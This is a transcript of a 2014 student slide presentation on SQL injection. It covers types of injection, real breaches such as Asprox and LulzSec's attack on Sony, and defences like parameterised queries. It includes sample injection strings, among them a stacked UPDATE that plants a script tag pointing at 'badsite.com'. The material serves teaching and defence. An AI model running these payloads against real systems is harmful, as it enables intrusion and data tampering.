sql injection
DESCRIPTION
SQLi Presentation for IT 6873 (Fall 2014)TRANSCRIPT
SQL InjectionAaron HillIT 6873Southern Polytechnic State University
What is it? A technique where
individuals insert or append commands or coding into a statement thus altering the intent and actions of the perspective query
Allows hackers to view, delete, or change data in a compromising way
Basic Examples Utilizing a statement that is always true
Entering a value into a field that will render a statement condition as always true (1=1 or “”=“”)
SELECT field_name from table_name where username = ‘’ and 1=1 --’
Appending another command through a terminating character (such as ;)
Types of Vulnerabilities Incorrect type handling Database server Blind injection
Conditional Responses Conditional Errors Time Delays
Combinations SQL injection can be
used in conjunction with XSS, malware, Javascript, etc.
In 2008, over 1 million websites compromised due to hybridized SQL injection attacks utilizing other components
Places of Concerns
SQL Code HTML tags Stored Procedures
HTML Tags SELECT FIRST_NAME, LAST_NAME FROM
CUSTOMER WHERE USERNAME = ‘’; UPDATE TABLE CUSTOMER SET MIDDLE_NAME = ‘<script src=http://badsite.com>’; --’
Stored ProceduresCREATE PROCEDURE
getOrdersByCustomerID @custId nvarchar[50] AS
EXECUTE(“SELECT OrderID FROM Sales WHERE CustomerID = ‘” + custId + “’”);
Difficulties Obvious attacks
Structure deletion Denial of Service Increase load on the system
Covert attacks Changes to data Changes to code
Real World: Asprox Executable installed via phishing emails
or through the network Searches Google for vulnerable ASP
sites Downloads compromising Javascript
from direct84.com Attempts to download additional,
harmful Javascript, Asprox copies, Trojan Danmec, and/or SQL attack tool
Real World: Sony Hacked by LulzSec Attack on several of Sony’s ventures
such as SonyPictures.com and music division servers
LulzSec claimed attack resulted from a single statement
Purportedly injection may have been involved with PSN attack
Real World: Sun & MySQL TinKode and Ne0h compromised specific
Sun domains Obtained column names and email
addresses in a table MySQL.com
Exposed metadata, account names, and passwords (both admin and blog)
Issue with Web coding, not database
Real World: CyberVors Russian cyber criminal group Compromised 400,000+ servers and
sites Approx 1.2 billion usernames and
passwords stolen Indiscriminant targeting of companies Utilized different hacking methods and
several individuals and groups over several years
Preventative Measures Blacklisted Words or
characters Not recommended
Utilizing SQL Parameters Validation Controls and field
classification Disallow error messages from
revealing database metadata Johnny’s Google Hacking
Database Johnny.ihackstuff.com/ghdb
Validation Samplesif(UserID.contains(“’”)); {
<redirect to an error page>}else {
<perform query action hear>}
Validation Samplestry {
<convert input to value of specified type>
}catch {
<redirect to error page>}
Validation Samplesstring ID;database.querytext = “SELECT ID FROM
TABLENAME WHERE USERID = ?”;database.addParameter(ID);database.executeQuery();
Follow up Questions What tools or techniques can be used to
determine vulnerabilities within a system for SQLi?
Have you had to reassess code to prevent SQLi vulnerabilities? If so, please elaborate.
What are some other modern cases involving SQLi?
References & Readings Arthur, C. (2014). LulzSec hacker arrested over Sony
attack. Retrieved from http://www.theguardian.com/technology/2012/aug/29/lulzsec-hacker-arrest-sony-attack
Databases vulnerable to SQL injections. (2008). Data Strategy, 3(12), 6.
Dorai, R., & Kannan, V. (2011). SQL Injection-Database Attack Revolution and Prevention. Journal Of International Commercial Law & Technology, 6(4), 224-231.
International Business, T. (0006, July). Post-PSN hack: Sony apologise at E3 as LulzSec mount fresh attack. International Business Times.
Kirk, J. (2013). Asprox botnet proves to be a resilient foe. Cio (13284045), 8.
Lemos, R. (2014). Russian Cyber-Gang Gathers 1.2B Login Credentials Via Website Flaws. Eweek, 7.
OWASP. (2014). SQL Injection. Retrieved from https://www.owasp.org/index.php/SQL_Injection
Prince, B. (2008). Botnet installs SQL injection tool. Eweek, 25(16), 21.
Sullivan, B. & Liu, Vincent. (2012). Web Application Security: A Beginner’s Guide. New York, NY: McGraw-Hill Companies.
Sun.com, MySQL.com Hacked, SQL Injection Attack. (2011). Channel Insider, 1.
W3Schools . (2014). SQL injection. Retrieved from http://www.w3schools.com/sql/sql_injection.asp